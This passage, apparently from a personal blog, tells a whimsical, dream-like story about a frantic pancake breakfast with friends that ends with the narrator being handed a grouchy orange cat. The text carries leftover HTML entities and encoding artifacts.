It was on a high shelf, and every time I tried to grab it, it kept slipping and ducking behind the other bottles and spices.\u00c2\u00a0 More people would be arriving soon, the kitchen was a mess, I hadn&#8217;t even started cooking yet&#8230;.\u00c2\u00a0 I was in a panic.<\/p>\n<p>But my friends said, &#8220;Rebecca, thank you so much!\u00c2\u00a0 It&#8217;s so nice of you to make pancakes for us.\u00c2\u00a0 You&#8217;re the best.&#8221;<\/p>\n<p>I said, &#8220;I haven&#8217;t actually made any pancakes yet!&#8221;<\/p>\n<p>They said that they had already got all the batter mixed up and ready to go.\u00c2\u00a0 &#8220;Thank you, &#8221; I cried.\u00c2\u00a0 &#8220;You guys are amazing.\u00c2\u00a0 You totally saved me; I don&#8217;t know what I would do without you.&#8221;<\/p>\n<p>They handed me a grouchy looking orange cat.
